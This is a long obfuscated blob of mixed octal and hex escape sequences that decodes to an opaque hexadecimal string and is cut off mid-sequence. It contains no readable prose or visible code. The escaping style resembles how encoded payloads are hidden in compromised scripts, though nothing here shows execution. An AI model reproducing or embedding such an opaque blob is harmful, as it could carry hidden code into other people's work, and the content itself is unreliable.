\61\x61\x38\x30\x39\143\x34\x63\x65\67\60\x64\62\x35\x31\x39\70\143\x32\64\x30\x66\63\x30\64\x35\x61\x32\145\141\144\x61\x66\67\62\x62\64\67\x33\141\x35\70\x62\x32\x66\65\60\64\x33\144\141\x61\146\70\143\x65\146\x38\144\x63\x65\x31\143\x37\x38\142\x34\x39\x30\x66\x63\144\x65\144\61\60\64\144\x37\71\60\x37\x61\67\x64\x33\143\63\x62\144\144\x32\66\x34\143\65\71\142\70\x61\x31\67\x36\x61\x64\142\64\143\145\145\67\x35\x30\61\144\66\145\146\x33\65\70\60\x31\x62\144\70\65\x32\x61\142\65\143\63\x66\66\x62\60\x61\x61\145\x32\71\64\x39\144\x35\65\x61\x64\64\63\x65\66\60\x33\143\x66\60\x65\61\x35\x33\x31\67\x38\x64\141\66\65\x63\141\x30\x32\x32\64\145\x64\144\63\64\x32\x31\63\64\x34\142\x36\64\64\63\62\x61\143\145\x37\71\x38\x39\141\x35\65\x32\x63\x61\x38\66\x65\x61\x34\64\x61\145\144\x64\143\143\70\x31\146\x33\144\x36\x32\x33\x33\x62\60\71\143\x38\x30\x61\64\x31\66\63\x34\x33\146\x38\146\67\61\141\x61\71\x39\x30\63\x30\64\60\63\145\142\x62\x38\65\63\67\62\x63\x33\x36\x36\67\65\x38\x39\x38\67\x65\x30\63\63\x36\70\x37\65\60\71\x61\x64\62\70\x66\x39\x38\x65\71\x37\x63\143\x32\x35\145\142\144\x64\x65\141\x36\146\x61\x36\144\x64\x66\x30\x30\64\70\x64\71\65\x34\x35\141\x66\x36\x36\67\143\x63\145\60\144\64\x31\x63\144\x65\64\x32\144\63\143\x37\143\143\71\x36\63\x66\x38\71\x65\70\x33\x38\64\70\x61\x36\x34\x62\x66\x30\x61\144\67\66\x62\x66\x64\x63\x34\143\70\x39\x38\x39\x66\145\145\145\x65\x63\x38\x66\143\x31\x34\146\63\x30\x30\144\71\x36\x31\65\143\145\x39\x33\x61\146\x32\x34\x64\x38\145\x62\x64\x37\62\x37\x39\61\63\x66\x66\71\61\x61\145\60\145\63\x37\144\143\x38\63\142\x32\71\62\70\x65\144\143\x39\70\x30\x30\x65\66\x34\65\141\x37\x35\61\x31\x38\143\62\145\x32\x34\65\x31\145\x66\x65\x31\x37\x61\146\x62\x38\x30\x65\62\142\x65\x31\x66\62\141\61\67\x32\67\x66\141\63\144\62\x31\x64\64\71\x64\x64\145\145\143\71\x33\x33\x33\x63\65\63\x38\x34\x64\x33\64\x65\146\x34\x62\x39\146\60\146\x35\144\145\x66\63\x32\x36\x66\x38\143\x32\x31\x32\67\70\71\x62\142\146\x39\142\141\65\62\x65\x33\66\x33\x62\146\x35\143\x31\145\70\61\67\142\x64\71\60\143\61\x64\146\x36\x62\x31\x62\64\61\x32\62\x34\141\x39\x61\66\x30\146\x31\67\x65\144\66\62\145\64\x37\x62\x30\66\63\x65\144\x66\x30\x63\x39\x62\66\x36\67\x38\66\142\145\x37\61\x33\x66\x61\x38\145\x31\141\62\x38\x62\71\144\x66\144\x66\142\x63\63\x65\146\62\142\x63\x65\x61\64\x65\x61\143\x37\x65\64\61\x31\142\63\x63\x36\60\x36\142\62\x61\70\141\144\61\144\142\x66\x64\x66\x61\141\61\70\62\146\71\x36\62\x34\146\67\x33\x36\65\x39\71\67\65\62\x39\141\146\x32\66\x65\141\x38\x37\60\70\145\142\x36\70\x34\144\64\141\70\146\71\62\x35\66\66\x38\x63\x62\x61\x35\x36\x61\67\62\143\71\146\144\x38\142\70\x37\66\x39\70\x66\x39\x61\x62\144\x61\146\65\146\x63\x66\60\x34\x37\x64\x33\x34\65\x39\x38\146\x32\x37\67\141\x34\x63\145\x31\60\61\x38\x39\x61\x39\x39\60\145\x61\143\x61\x63\x62\146\65\x32\x63\x61\144\x33\x38\142\x38\x33\61\61\60\x64\x34\66\66\146\62\x36\x64\141\60\144\x36\145\x62\x32\71\70\x36\x39\142\x33\60\x30\x66\61\60\145\x66\70\67\x30\x39\x62\x39\65\144\144\x33\x66\x65\x30\62\x36\71\144\64\61\141\x30\141\63\x38\x31\61\71\145\62\143\x66\x35\x66\x64\62\61\71\67\63\143\x64\x30\143\145\146\144\x38\70\71\x35\60\67\67\x33\62\x32\70\142\70\x37\63\146\x38\145\146\70\x36\62\x38\141\142\x30\x39\x32\x37\65\x35\143\x32\141\x32\x61\71\x66\145\144\65\x62\64\x63\62\x63\61\x33\x37\146\146\71\x30\x30\64\x31\64\x35\142\60\70\x66\x31\141\x62\x63\67\x62\143\x35\61\71\x61\x32\67\62\65\70\x32\x66\x65\x35\70\x36\x61\x35\x30\x61\70\61\x66\64\144\66\x64\141\70\142\64\x63\62\x33\x36\x33\141\63\62\x36\x32\66\141\x61\x34\x65\64\x39\64\66\146\144\145\x38\61\x33\66\x62\x64\143\x32\67\x66\146\67\60\x39\144\x66\145\x65\x38\x39\x39\62\141\146\x62\x37\x61\x34\60\141\x33\141\70\x65\144\70\x62\x35\65\x31\x64\61\142\x36\x65\65\x62\x33\143\x66\142\x39\x38\143\x61\x31\60\x33\x61\x64\141\64\143\x37\x38\x38\x35\x36\x36\70\x33\x31\x64\x63\x36\64\x35\x38\60\x66\x63\67\66\71\66\x32\x36\71\70\142\64\66\x33\x61\x38\64\146\71\144\x31\x32\146\70\143\66\x38\71\x61\x66\x39\66\67\x37\x35\x65\x36\61\x35\x37\64\x35\142\67\x30\x38\x63\67\146\x31\61\143\62\x62\x37\60\63\60\141\x36\x30\x37\x66\60\146\x33\x64\63\x31\70\142\63\146\71\145\71\x62\144\71\71\x65\x66\x64\64\x30\x31\63\141\60\x66\x66\61\x38\x31\66\x39\x62\67\x66\x37\64\65\x66\x30\x31\65\x37\143\x62\146\70\x33\71\x62\144\x66\145\66\x66\x31\65\70\x38\61\144\x64\144\65\x62\144\x39\66\65\x65\141\64\x35\71\x37\142\x34\70\x32\x33\65\x33\x33\x39\141\x61\142\x36\146\61\146\x37\146\x35\x33\61\66\142\x31\71\x36\x34\66\x65\143\142\x35\x63\x34\x62\62\x38\65\144\x39\62\x36\x63\x64\146\67\142\66\x63\x37\144\63\70\141\145\x61\x36\141\60\67\61\67\71\64\x36\x64\x38\x31\x61\67\x61\x32\144\x63\x63\x37\x33\70\x30\x63\x30\x64\61\x38\146\144\x34\60\x31\63\x66\63\x65\67\66\x32\x64\65\x33\x34\67\x37\x32\141\x62\x66\145\x39\62\x32\x65\x39\x33\x38\141\70\61\67\70\65\60\61\x34\63\60\144\70\x66\61\66\x31\x38\x34\x38\63\63\62\x35\x63\144\x38\x62\x37\x63\61\62\x61\142\x63\67\x33\63\x64\146\x34\64\142\142\x36\141\x30\x64\63\x37\142\x30\62\141\x34\x66\62\67\x30\x65\63\146\67\x35\x62\x34\63\141\x65\x62\x64\71\x33\x63\x63\63\x37\x63\x62\x38\62\142\x32\x64\x37\70\146\67\x37\145\x39\x31\x37\x66\x39\141\142\x66\x31\63\x35\146\144\x32\x34\61\146\144\x36\x61\66\70\62\60\65\x66\141\x62\71\x34\x34\66\67\60\145\x32\144\x65\x62\144\144\x38\x66\x32\x32\65\x39\x63\x36\x39\143\62\x65\x34\143\x61\61\x64\141\60\x34\70\x63\144\x63\x65\x38\61\63\62\x30\141\x36\145\x37\x39\x35\x62\x64\64\x62\67\x34\x31\146\70\144\x39\x62\x30\x39\144\x38\144\x66\145\x62\x62\70\62\70\x31\65\62\66\x35\x63\x65\67\x65\141\65\x66\x39\x63\66\x35\64\x65\67\61\x62\144\67\67\x37\64\64\x30\x62\x30\x65\65\x61\x65\x64\x34\71\143\61\x65\x65\66\141\x31\65\x37\143\71\67\67\x61\x33\x36\x31\x38\144\145\63\x39\x63\x34\71\65\x61\61\145\x65\x61\70\x34\x61\x30\62\71\143\x61\x30\x39\62\60\x63\144\x34\x66\61\x30\66\66\x31\143\145\65\x30\x62\66\x63\x66\x39\61\145\65\x36\x35\143\143\66\71\66\x32\62\x62\71\x65\145\x36\x37\67\x64\67\x63\66\141\145\x31\x62\142\66\63\146\x32\70\x66\62\x63\x30\x33\x34\70\63\60\x65\142\70\62\x66\70\x39\x31\x34\x34\141\x33\145\143\x64\x32\x30\x31\61\x64\142\66\60\x63\x34\144\71\x34\x31\67\144\67\x65\70\65\146\x63\x34\63\143\144\61\x37\x39\x61\x33\x34\66\66\65\x32\x39\64\x61\x36\x38\145\x65\63\x64\65\x38\63\64\62\62\x35\60\146\63\x33\61\146\x62\71\x38\x38\x39\60\142\145\x34\x65\70\64\x64\65\71\65\143\145\x65\x33\145\x30\64\70\142\x32\141\x66\61\70\67\x64\71\x63\142\143\x36\60\x62\x32\64\x38\x39\x66\144\x31\65\66\x66\x32\63\x32\x61\70\x65\62\144\65\x61\x30\x61\x65\x61\143\142\x32\62\x32\64\x62\66\x61\x63\x34\143\x62\x62\143\67\x65\x33\x64\x61\x30\x35\x64\61\x65\x39\x33\63\141\142\x61\146\71\x32\x63\x63\x31\66\67\x65\x64\x63\x36\x35\x36\x32\62\x66\65\x66\66\146\x31\x62\142\x39\63\x34\x62\70\x34\143\x34\x33\145\x31\x30\x31\64\67\144\x62\143\62\x39\65\x38\x37\x64\x39\x36\61\x34\67\x37\63\143\60\66\71\146\x34\x64\64\71\x39\x35\x37\61\x36\67\61\x35\142\x61\x39\x36\x32\142\70\x38\64\143\x65\66\x31\141\x30\143\70\64\x38\63\146\x32\144\70\65\x37\x33\71\x36\x31\x39\x63\66\x64\x33\63\64\x66\66\x37\144\63\63\x36\141\x64\x63\64\x35\63\143\67\x38\64\x66\x61\x32\x39\x62\64\142\x61\x66\144\62\142\64\x38\x39\x61\66\x38\x35\x64\146\64\x64\x30\70\x37\66\x35\146\x34\70\x65\61\x65\65\64\67\x36\x36\141\x33\143\144\x35\61\61\146\62\144\x66\x38\70\71\65\x32\63\71\144\x31\x66\x33\x64\x66\x37\142\x33\x34\x65\x35\144\65\x66\x66\x66\x64\141\x61\66\x63\62\141\x32\x36\x39\x34\x33\64\x36\x35\x30\143\62\141\61\x31\x35\x63\60\63\x35\x62\x39\60\x31\143\142\63\67\x38\x30\71\x62\63\x65\x63\146\x34\x63\x38\x32\64\x30\146\62\60\143\x33\142\x38\143\x63\x33\145\x31\145\63\65\66\66\x38\144\x61\x34\70\x33\70\x32\144\x37\x31\60\63\x33\x31\x34\60\142\143\x30\x33\x64\145\65\x30\63\x32\141\71\144\x35\x34\x34\x37\144\x65\x33\x37\x39\x39\64\x30\71\61\146\x38\x64\70\x66\61\71\x63\x63\x30\66\x38\x61\62\62\142\61\145\x66\x32\71\x36\63\x37\x34\65\144\x61\x38\x31\70\61\143\65\70\66\x35\x36\x61\67\x66\63\x32\x63\146\141\144\x39\142\70\65\x39\x35\x37\x32\61\x61\143\x63\x61\x34\142\141\x38\x66\x32\x63\x66\x39\67\64\x30\64\x36\62\x36\61\x34\x34\x64\145\64\145\65\67\x38\143\x32\141\62\x30\142\x30\145\x62\x36\x32\146\x66\143\63\x62\142\65\x34\146\x64\x61\x38\70\x63\144\x39\x37\x62\x34\x62\x64\x64\x35\x61\71\x63\62\x39\x61\x63\67\x38\145\x32\145\x61\143\x64\63\61\x61\61\x62\141\61\64\x36\x66\x31\66\x35\x35\71\64\61\x39\x30\63\x31\145\x65\141\x61\x35\x35\143\x62\66\x34\70\61\63\x37\141\66\66\62\x38\63\x66\60\142\145\x64\66\x35\x62\70\71\65\64\67\70\141\70\x33\x65\63\x61\65\x33\x30\62\x66\x64\146\x36\64\x35\x33\66\x65\x39\60\141\64\x35\67\141\64\64\x38\x65\141\143\x62\64\143\x34\x34\x31\x65\141\x63\71\x65\63\70\71\x66\x31\x30\145\x66\61\63\63\143\64\x32\62\x62\60\141\x37\143\x65\x64\60\141\70\62\x64\x32\x30\x64\143\x30\71\145\x66\65\146\x33\x37\65\65\x65\x36\70\143\63\x31\x30\64\61\143\x39\71\63\x63\x62\x65\x65\66\71\x37\x39\67\x39\141\x65\70\65\144\x64\71\x36\x32\61\x63\x33\x66\x65\71\x32\60\146\x37\x35\x35\x63\x31\71\61\x32\x35\x35\x62\x34\x38\x65\x32\146\65\60\65\145\65\65\x31\x32\63\x36\x36\x61\x64\66\60\63\70\144\x64\60\67\x31\143\60\64\70\145\x31\70\x34\x33\x63\65\146\x34\x32\x62\x39\x66\x65\141\65\x66\x38\146\x31\x64\142\x66\60\x62\70\x38\144\142\x38\64\x65\x61\61\x39\144\145\71\x38\60\x33\60\x31\62\142\x34\x37\x64\62\62\x61\x31\146\62\71\x62\x32\x34\x30\64\x34\x31\60\x33\x39\63\66\65\x36\x37\146\60\65\67\65\x37\60\x33\61\x61\146\x62\71\x32\x34\x34\x35\x36\x35\70\x66\142\71\70\64\146\x64\x65\x63\61\x33\71\60\71\62\66\64\x38\x30\143\141\x30\x35\60\x63\x63\63\144\x39\146\61\x62\64\x34\66\x36\x36\146\62\141\x65\144\x34\71\61\x66\143\x33\144\146\x37\70\x37\64\x39\64\61\67\x37\145\67\145\142\146\x65\x37\x62\142\66\x62\x30\x33\x37\x36\64\x33\x30\66\x64\144\x64\60\60\66\x39\x32\145\x63\60\x37\x61\62\71\x35\x35\x64\142\63\141\x38\x63\x61\145\144\62\x37\142\65\71\141\x61\62\x30\x37\65\x33\x37\x64\145\x61\145\62\x32\71\x37\x37\67\144\x62\66\63\71\65\x35\146\143\71\66\x31\66\x34\x37\x65\x64\141\x32\x39\x64\x33\x31\141\70\x64\x63\60\x30\x61\x64\67\67\x31\65\62\143\x38\x32\142\66\145\144\67\145\x32\x36\143\146\x39\x65\67\60\67\x63\71\x32\x39\x64\x35\145\x36\x35\x62\x33\x62\63\62\64\x36\65\144\x32\x63\x32\x33\143\62\x66\60\65\146\142\142\145\64\x62\70\143\x61\x63\143\x30\x34\143\x61\x62\x65\67\x37\145\x66\x32\143\144\144\x39\x65\143\141\x36\70\x61\x62\x36\x30\x32\x34\143\x62\142\x33\x66\142\146\61\145\141\x65\x66\146\x64\67\x64\x39\70\61\x33\145\x30\71\x39\63\x31\x66\66\71\61\x64\67\64\145\x35\60\145\143\x37\67\65\x38\61\x61\63\142\145\61\146\142\x36\x38\66\x35\x39\60\x66\x38\x63\146\x34\x66\64\60\141\x33\60\141\x34\64\67\x39\60\65\x36\70\62\141\63\64\71\143\x32\x32\x38\x32\x34\67\x62\x64\146\x30\x36\x38\x32\x62\61\60\63\64\64\x36\63\x33\66\x66\x35\x32\x33\x32\x36\x62\67\x39\65\61\x65\x30\x39\x35\143\65\66\x30\71\63\143\x35\x39\x36\x30\x63\61\x34\x61\61\66\66\x39\x32\144\146\145\x66\141\x37\142\x30\146\x62\x62\x38\x30\x65\145\x31\x64\61\144\x38\65\61\x36\65\x39\x30\141\141\x34\x61\61\x34\x61\x61\x38\146\x30\146\x66\x31\143\141\x66\71\x66\63\64\63\145\145\60\x38\67\70\143\x62\64\71\66\x37\x31\144\x66\x30\143\67\x36\146\66\x34\62\71\x33\x39\64\146\x30\63\x62\x62\x30\63\142\x34\64\66\x65\142\x36\144\62\x61\65\x65\x62\x35\67\64\62\x38\x61\67\x64\60\144\144\x62\66\63\145\144\x32\64\x30\71\141\65\60\x35\145\61\62\142\x36\71\142\141\65\145\x65\x64\x31\146\64\66\x64\60\141\61\x37\x38\66\x61\x33\70\x37\x34\61\x32\144\x64\x33\61\x36\x33\x65\x37\x34\61\65\141\66\64\x33\146\144\x37\x65\x39\x34\62\66\66\71\145\63\x65\63\142\x61\141\67\63\143\64\x34\142\x65\65\x64\143\x39\145\142\x35\x64\x35\x39\x32\142\x38\62\x37\x38\x34\x32\x38\63\x63\143\x66\143\65\145\71\143\67\x34\63\x65\x32\141\142\x66\x61\x31\x64\x30\x35\71\64\71\65\145\x34\145\143\66\x37\x65\x64\146\x66\71\65\67\65\65\64\x38\x32\x32\x39\146\60\71\x37\61\142\x64\x35\70\x63\x64\66\x36\146\65\65\70\x32\x39\144\61\x30\x30\61\x34\61\66\65\x32\145\x35\x38\x33\141\141\60\141\146\x31\x66\144\145\67\x61\x37\x63\x34\x62\71\x34\144\146\65\63\144\64\x66\x63\62\144\x32\70\64\x35\x34\x63\x36\x37\x34\x38\x35\60\64\146\66\143\x35\x31\x65\146\145\x38\x34\65\65\143\x62\142\60\60\60\x64\66\65\142\145\x33\x36\144\x30\x34\145\x65\x61\x32\x36\70\141\141\65\146\62\61\62\71\x34\x32\70\61\67\146\141\x64\146\x62\x33\65\67\x61\x35\145\63\x32\x62\x63\63\61\x63\x38\x65\x61\67\x61\142\x35\66\66\x63\66\x62\65\x31\64\x37\70\144\x36\71\145\144\x31\64\x65\146\x63\x62\x64\x39\142\65\x62\x36\62\70\144\67\61\x63\61\62\x39\x32\x34\143\71\63\71\x37\x33\x32\70\x39\x61\x39\x38\64\x30\146\x64\x39\x64\146\x64\x36\143\145\x62\x64\62\146\70\x61\x63\x32\x37\71\67\65\x64\63\x64\x35\142\67\x64\x63\x38\x32\x64\x64\146\x30\x36\63\x32\143\x34\x62\64\61\143\x34\65\70\142\142\x62\x62\x34\x37\71\x65\x30\65\x61\71\x35\x38\143\62\64\x33\x39\60\64\142\144\70\145\x63\x65\x38\x39\x38\x39\62\x32\x65\x66\x30\x38\145\64\64\x62\66\143\145\67\61\x66\x63\x64\x35\x35\142\65\145\x38\144\x32\71\70\142\64\71\63\62\x61\x34\x31\x63\142\x39\x39\65\x35\x31\144\67\x34\x37\65\71\x33\65\x64\x61\65\x63\144\x30\x61\143\70\x35\x38\x38\x38\67\x61\x36\x30\62\63\142\144\141\x33\62\141\x38\x32\x30\x66\x31\63\x39\x39\144\70\x62\144\70\66\x31\143\x37\143\x34\146\x65\x33\x32\x37\145\x35\64\145\x63\70\x61\70\145\x64\x38\x38\x38\x38\x63\66\x30\x31\x31\x63\143\61\63\62\143\62\65\142\x36\62\143\61\64\67\x37\x63\66\x65\61\x65\71\66\66\x32\x33\x35\144\x66\x30\64\x39\x62\141\143\145\146\60\142\144\141\x66\142\145\x34\71\x33\64\x35\60\x65\x63\x35\x64\x39\x31\x31\x39\71\60\x35\x63\66\64\63\144\x33\x39\145\71\x38\x32\145\x63\141\x66\x64\146\x33\x35\x30\x33\x64\x61\x32\145\62\x66\71\x65\x65\143\141\63\x61\66\65\143\65\x64\x36\x31\70\x30\142\x38\144\x64\x36\x35\62\x39\142\x30\x66\x30\143\x62\62\x63\61\x65\x35\144\70\63\x38\146\x30\x39\x31\x32\141\60\x35\146\x38\61\x34\144\62\x30\x32\60\67\64\x66\71\144\x32\71\61\146\60\x35\x32\x39\62\x64\63\141\143\x38\67\66\x30\x30\146\x66\x35\61\x61\71\70\62\67\145\x31\65\63\x62\63\71\71\x61\x35\x61\x66\x61\61\70\x38\x36\x63\x39\x30\143\145\63\63\142\63\141\x30\142\62\67\x31\x30\x34\x30\64\70\63\x30\x32\x37\71\71\x38\x30\x66\x35\141\141\70\143\143\70\x32\x39\x38\x36\x66\x32\64\x34\x32\64\61\x32\x64\62\142\60\x31\x31\63\143\x38\70\60\63\64\64\142\x35\x34\x64\70\142\146\63\x30\142\144\x66\71\x37\60\146\x30\63\x37\x38\x66\x35\x38\x38\x63\145\64\66\x33\x31\x65\71\64\x36\71\x39\143\x65\x64\63\65\60\67\x64\x65\x30\70\x38\x63\143\70\61\x32\x37\146\x37\66\x31\70\x65\60\x63\65\144\60\62\x32\63\143\x35\146\x63\141\65\x64\65\x34\61\x30\62\67\145\64\x66\64\x32\x61\62\71\144\62\143\62\71\67\63\x39\61\x36\x32\144\x33\x37\65\141\x63\142\143\x64\x34\141\x37\60\x38\143\x36\x64\63\x39\x36\60\62\70\66\x32\65\60\x36\x63\70\146\x30\71\x36\63\x63\x66\66\143\71\x63\62\145\70\70\x30\142\145\x31\60\x61\x62\x31\67\141\60\x62\x64\x33\143\x37\x63\x62\61\142\66\x36\60\70\63\70\x63\x39\x63\x61\146\x61\x63\146\x35\64\x61\141\x34\x30\144\60\63\x36\x31\60\143\x38\63\143\x38\x63\x63\66\x34\x34\x65\x31\x33\x61\70\x64\61\66\x39\65\x36\x65\62\x63\65\63\61\141\x64\x35\x35\64\141\66\144\63\71\x61\66\66\143\x37\x65\143\60\x33\141\x31\x36\x31\146\62\70\x37\143\145\x33\146\70\60\x34\145\x61\60\x33\63\142\x31\x33\x63\142\146\x36\146\63\x64\x33\142\62\144\x66\62\x62\x35\66\x61\66\62\66\70\60\146\x61\62\145\71\144\145\141\63\x65\x31\61\x64\60\x35\62\x63\x64\x66\x61\x31\x34\x37\x39\62\144\62\x39\x39\x32\142\x63\x34\x31\66\x62\145\x65\70\x33\144\x33\142\70\142\x37\x38\64\x38\63\63\x61\145\x38\63\65\x31\71\x61\x34\67\x64\x34\x33\x61\x37\144\x35\x30\x64\x62\62\70\x35\x35\62\x63\63\x34\x36\x32\65\x39\146\64\x37\x65\62\62\x65\x61\x63\143\x32\x66\x38\64\x33\67\65\x39\67\143\x35\146\x65\x36\x38\144\x37\x64\x62\x62\67\x66\x37\144\x65\60\143\65\x37\70\61\x32\60\x64\x64\146\67\x63\x38\62\60\x64\x34\65\61\71\142\141\64\x65\70\64\70\63\143\x62\62\x66\142\x33\142\145\65\x63\71\x65\63\60\71\145\66\143\x32\x32\x62\x62\144\x38\x61\61\x33\x37\x66\x62\63\x31\x31\x30\65\x61\65\x39\x37\61\60\71\65\x34\x65\60\62\67\x62\144\146\66\63\x33\x38\60\142\x61\141\144\x32\x64\62\62\x64\x39\144\x34\146\x30\x62\64\x64\143\x36\x39\143\144\x62\63\145\144\70\141\63\x33\145\146\x63\x64\67\142\x64\62\62\x33\142\64\x39\142\x37\143\143\x31\144\x30\x30\146\63\x63\x38\70\71\x37\66\x31\142\141\x65\x30\x37\146\64\65\66\66\70\x33\x63\60\141\64\61\65\x30\x35\144\x36\x66\x65\62\63\144\60\x38\64\x38\x65\x36\x39\x64\x37\x38\65\64\70\70\141\146\x61\66\60\64\143\142\x36\61\x33\x36\x30\67\x31\x61\x64\x63\143\x66\x62\x30\67\64\62\70\62\146\x66\x63\141\66\x63\x62\70\x32\x31\141\x61\145\63\x31\x35\65\x63\x36\60\63\67\x62\x65\70\x65\146\66\x37\x39\x61\65\146\146\x37\142\64\x63\x63\67\61\x39\70\x34\x39\66\61\65\66\x32\70\70\67\x66\x36\141\71\x38\67\x31\141\143\x66\64\145\x65\143\71\141\71\64\x37\65\70\63\143\x65\x61\x62\141\x66\x31\70\x36\66\141\x39\144\144\x66\141\70\65\71\x63\x66\x35\x36\66\x38\66\61\142\65\63\144\x38\x30\61\63\146\62\61\x66\x31\143\64\x36\60\x64\x66\x62\x39\144\67\146\x64\60\x32\x37\70\143\141\x61\64\x66\x62\66\x39\x30\61\x37\x30\x65\67\x36\66\145\x32\146\x62\x33\60\x32\71\x65\71\145\x64\62\60\62\64\143\x63\x61\63\x65\x34\x33\70\70\x65\70\x39\x31\x32\x30\63\61\x39\145\145\x63\144\x62\65\71\x35\x65\x35\66\143\x65\x36\x31\x61\x34\146\x62\x64\61\71\x36\63\61\142\x36\146\x66\64\x30\63\70\67\x66\x61\144\70\x35\142\144\71\x64\x62\144\141\142\x39\143\x38\62\x34\x65\x32\x63\67\62\x64\x32\x31\145\141\x39\64\x65\x65\x65\x62\x36\143\141\71\146\63\x66\60\70\64\x31\64\146\61\66\x38\141\144\64\146\146\60\145\62\145\x31\x36\x36\x66\x37\64\63\x38\x38\146\x33\x66\x64\x66\x62\63\60\144\142\144\60\71\146\x66\x32\x66\141\65\63\x35\65\60\x63\x35\x31\145\145\62\x35\143\65\x36\63\66\146\x66\x31\x39\66\x39\62\x63\65\146\63\63\x35\143\x66\145\142\144\x63\x31\71\65\60\142\x33\x64\x37\x63\142\x31\66\143\x63\146\x34\x39\143\66\x34\141\x31\67\146\x34\x65\x64\60\65\143\x62\65\146\x34\x62\71\x65\64\61\141\x37\x64\x63\63\60\64\141\145\x63\x31\144\x33\x36\x34\x63\x35\60\142\63\x38\63\x66\61\61\62\145\x30\x38\x65\x64\62\144\60\x37\67\61\x62\x31\x33\x33\67\x61\67\145\65\x39\x33\x62\144\x61\144\142\65\144\62\141\62\x38\x32\66\71\x65\x65\63\x62\x31\144\x64\141\61\x32\x38\x36\x36\x33\64\66\145\61\x62\x62\x36\64\63\143\x33\146\142\71\x64\x32\x65\x64\x38\62\143\x63\71\62\144\x64\67\64\70\144\146\143\x35\146\x39\x62\62\x38\x65\146\144\x64\x64\x65\x66\x66\x35\70\65\x35\x66\x35\142\x63\x31\x30\64\144\x38\x39\66\144\x39\x30\x39\x34\146\x33\x35\144\x38\143\146\70\x66\143\64\x39\61\145\146\141\62\x37\x34\x33\x65\146\63\x62\60\x39\64\144\x61\67\x61\x30\x62\66\x37\x66\x30\x39\141\x31\143\61\61\63\x31\65\x39\x32\x38\x33\145\142\141\64\x39\145\71\142\x66\x39\143\x37\144\60\71\x39\x65\143\141\x62\x64\61\x61\x38\x64\145\62\x66\x63\142\x64\142\70\x66\x36\71\x61\145\145\66\x66\67\x39\67\x64\x65\x38\x30\61\x62\x32\145\x31\x37\145\x66\146\x38\141\x35\x66\141\60\x37\142\x63\142\x65\145\x38\x61\66\67\71\63\64\x36\71\x37\x63\146\141\x61\x61\144\x34\66\70\66\x65\143\x37\x33\x35\x63\x64\65\70\x63\x31\60\66\143\x36\142\x34\x66\142\144\x66\65\x64\61\x66\146\x65\x64\x64\62\x31\x32\x39\x39\x64\64\x33\x63\141\x61\67\64\141\63\x64\66\141\x65\x65\x37\64\65\62\144\x65\70\x39\142\x33\67\x31\141\65\61\x64\x66\x34\145\145\64\61\71\x63\x36\x32\145\63\x30\x62\x39\144\141\x35\x62\x63\x34\64\63\x65\144\66\66\67\141\143\x38\x33\144\x34\x33\144\x62\x31\x63\144\x66\x61\x30\65\143\x36\66\x38\62\60\146\x32\x33\64\x35\x61\x30\65\x39\x35\x65\x61\64\x37\63\145\x61\146\70\x37\70\60\145\x33\x65\x64\141\71\x37\65\x36\x62\146\x31\x62\x66\x32\x63\x34\x61\x61\61\x32\x33\70\141\61\146\66\62\61\x62\64\x33\142\64\63\x33\146\x32\64\x64\x31\x31\x66\x65\x34\x33\70\x32\x66\70\144\67\143\x30\x64\x37\x34\x34\67\64\x35\x31\71\142\142\64\x30\141\x64\x64\x30\66\62\x38\66\x34\145\x64\x64\x31\60\66\x34\60\66\62\x66\61\x32\x37\x63\x34\x33\x37\x62\144\63\141\x65\x33\x61\x66\x62\67\145\x31\x30\x39\x37\67\71\x61\142\62\x63\71\x38\x30\x61\x66\144\144\67\64\x33\145\x36\x61\142\x63\x63\66\144\x30\x34\143\x31\71\x30\x66\x34\x35\64\x66\144\141\x34\61\70\x62\x30\141\65\x33\70\146\60\145\145\x30\x64\x33\x62\146\x36\144\67\65\x33\x34\x65\x32\71\x36\x66\62\x32\x35\65\x32\x30\x39\x34\x65\x31\x61\x33\x61\144\146\x38\x35\x62\x31\x64\70\66\144\61\67\67\145\61\x30\143\141\x34\x62\141\70\x62\63\x65\x34\67\x33\x35\70\70\x66\x32\x61\x66\x65\x35\x64\64\x34\x66\146\x34\x37\70\x34\63\x36\62\x63\x34\71\x34\x66\x33\x34\65\63\x66\143\141\63\143\x37\67\141\145\71\x37\x33\x38\x33\x38\64\70\x34\145\61\62\61\61\x65\x34\x32\141\142\x35\141\x39\x62\142\70\142\x30\61\x37\x31\67\145\60\146\x63\67\144\143\x32\67\71\65\65\x66\x61\142\62\63\145\62\71\65\144\x34\x36\63\x37\x32\144\145\x66\66\x65\x62\x66\61\71\142\71\65\70\64\x33\60\x66\66\x36\x31\x37\x39\143\x65\61\142\x33\x38\x32\62\x32\146\145\65\x62\65\x35\x36\146\x31\x63\146\64\146\145\x63\145\x64\x34\61\146\x36\x32\70\x31\66\x62\x38\60\x34\x65\61\x61\x65\x61\61\142\x65\71\142\66\67\65\x37\61\x35\61\144\x62\x32\66\x36\x62\71\70\x30\x31\x38\x37\141\142\x35\x33\142\141\x31\x39\x37\x36\66\146\x38\64\x35\x39\x66\x32\x63\71\x61\x30\61\x63\63\x39\x39\144\x61\x66\62\142\x34\66\x31\x37\x35\60\x38\x38\145\60\70\x33\x36\x66\x64\142\143\67\x37\63\62\67\x62\x38\64\146\65\144\x35\145\141\142\x63\146\67\x31\67\x64\x62\62\64\144\146\67\146\x34\66\x39\x34\x38\x36\61\x33\x66\x36\65\142\60\x33\64\143\x63\x37\x33\67\x34\x35\62\x63\71\x38\145\x31\x62\142\x63\x37\x64\142\x39\x32\141\x31\60\60\142\x64\67\x34\60\146\63\x34\146\71\x66\142\x33\x65\70\x61\144\x33\146\145\x35\62\61\63\144\x62\66\x65\67\x35\x37\63\64\x30\60\62\x63\61\x39\x38\x63\141\146\65\x35\x31\x31\66\142\x35\x36\67\60\64\144\x62\63\142\62\143\x37\x35\x62\66\146\64\141\146\70\x31\x36\67\143\x32\x64\x62\x64\141\146\x39\146\x61\146\61\63\65\62\x65\x37\145\x39\61\144\x36\142\x31\x62\62\x37\71\71\x38\144\146\142\64\143\x66\x32\x64\x38\145\x39\x39\x35\65\145\71\x64\x62\142\71\61\x39\144\65\141\x36\62\145\70\x38\70\141\x61\x37\x39\x37\x36\61\144\67\x39\x30\x39\x35\x38\60\143\x34\x39\x63\x34\145\x61\142\x30\63\x61\x38\x32\146\66\x37\x36\143\71\x64\66\x30\x33\x62\x34\x61\64\144\64\x61\x66\x34\x63\x34\65\70\x30\64\x38\x38\x31\144\146\x31\x35\62\x32\146\x31\60\62\145\x65\x30\x30\x62\145\x32\146\63\x61\x38\x38\x66\141\66\63\x39\x63\x63\x61\x39\70\141\142\x34\x37\x61\141\62\x39\x32\67\60\71\141\x64\x35\x32\145\x62\60\61\141\x31\x38\x63\x62\71\x38\x34\144\x33\x34\145\